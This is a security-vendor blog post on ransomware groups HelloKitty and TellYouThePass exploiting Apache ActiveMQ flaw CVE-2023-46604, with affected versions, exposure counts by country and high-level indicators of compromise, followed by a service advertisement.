Ransomware Groups Exploiting Apache ActiveMQ Vulnerability in RCE Attacks

A recently reported critical remote code execution (RCE) vulnerability that’s over 3000 internet-exposed Apache ActiveMQ servers. The Apache ActiveMQ is a scalable open-source message broker that facilitates communication between clients and servers. It supports Java and a variety of cross-language clients and numerous protocols such as AMQP, MQTT, OpenWire, and STOMP. It’s frequently used in enterprise environments where systems communicate without direct connectivity due to the project’s support for a diversified collection of secure authentication procedures. CVE-2023-46604 is a critical severity (CVSS v3 score: 10.0) RCE vulnerability that allows threat operators to execute arbitrary shell commands by exploiting serialized class types in the OpenWire protocol.

According to Apache’s October 27, 2023, disclosure, the problem affected the following Apache Active MQ and Legacy OpenWire Module versions:

• 18.x versions before 5.18.3
• 17.x versions before 5.17.6
• 16.x versions before 5.16.7
• All versions before 5.15.16

The fixes were available on the same day as the release of the recommended upgrade targets, versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3.

Servers Unpatched

Researchers discovered that 7,249 servers were accessible using the ActiveMQ services. 3,329 of the servers were found to be running an ActiveMQ version vulnerable to CVE-2023-46604, with all the servers vulnerable to remote code execution. Most of the vulnerable cases are in China with 1,400. The US is second with 530 exposed servers, Germany is third with 153, and India, the Netherlands, Russia, France, and South Korea each have 100 exposed servers.

Two Ransomware Groups Exploiting Vulnerability

One ransomware group, HelloKitty, is exploiting the Apache ActiveMQ remote code execution (RCE) vulnerability to infiltrate networks and encrypt devices. One cybersecurity company detected at least two separate incidents of threat actors using CVE-2023-46604 in clients’ systems to spread HelloKitty ransomware binaries and extort their targeted companies. The HelloKitty ransomware first appeared in November 2020 and had its source code exposed recently on a Russian-language cybercrime forum, making it available to anybody. The attacks were discovered two days after Apache released the security bulletins and updates, indicating that this is an example of n-day exploitation. Two MSI files were examined by a cybersecurity company disguised as PNG images which were downloaded from a suspicious domain and were discovered to include a .NET executable that loads a base64-encoded .NET DLL named EncDLL. EncDLL is responsible for looking and terminating specific processes, encrypting files with the RSACryptoServiceProvider function, and applying a “.locked” extension to them Among the artifacts left behind by the attacks are:

• Java[.]exe is operating as the parent process of an Apache application, which is unusual.
• Loading of remote binaries named M2.png and M4.png using MSIExec suggests nefarious activity.
• Repeated failures to encrypt files indicate inept exploitation efforts.
• Activemq[.]log entries including warnings about transport connections failing due to an aborted connection, which may indicate exploitation.
• The presence of files or network communications connected to HelloKitty ransomware, as identified by specific domains and file hashes.

The other ransomware group that’s exploiting the Apache ActiveMQ servers is the TellYouThePass ransomware. One cybersecurity company discovered that threat actors were actively exploiting the CVE-2023-46604 vulnerability for initial access in attacks targeting Linux systems and distributing TellYouThePass ransomware. Both ransomware shared email addresses, infrastructure, and Bitcoin wallet addresses.

Because Apache ActiveMQ serves as a message broker in enterprise environments, exploiting CVE-2023-46604 may result in intercepting messages, disrupting workflow, data theft, and lateral network movement. Because technical details on exploiting CVE-2023-46604 are public, applying security patches should be regarded as time-sensitive. Additionally, companies need to remain vigilant of the current threat landscape and update security patches to prevent future vulnerabilities. At SpearTip, our gap analysis allows our engineers to discover blind spots in companies that can lead to significant compromises by comparing technology and internal personnel. We go beyond simple compliance frameworks and examine the day-to-day function of cyber within companies. This leads to critical recommendations by exposing vulnerabilities not only in software but also in companies’ people and processes. Identifying technical vulnerabilities inside and outside of companies provides a deeper context to potential gaps in the environment.

If your company is experiencing a breach, call our Security Operations Center at 833.997.7327 to speak directly with an engineer.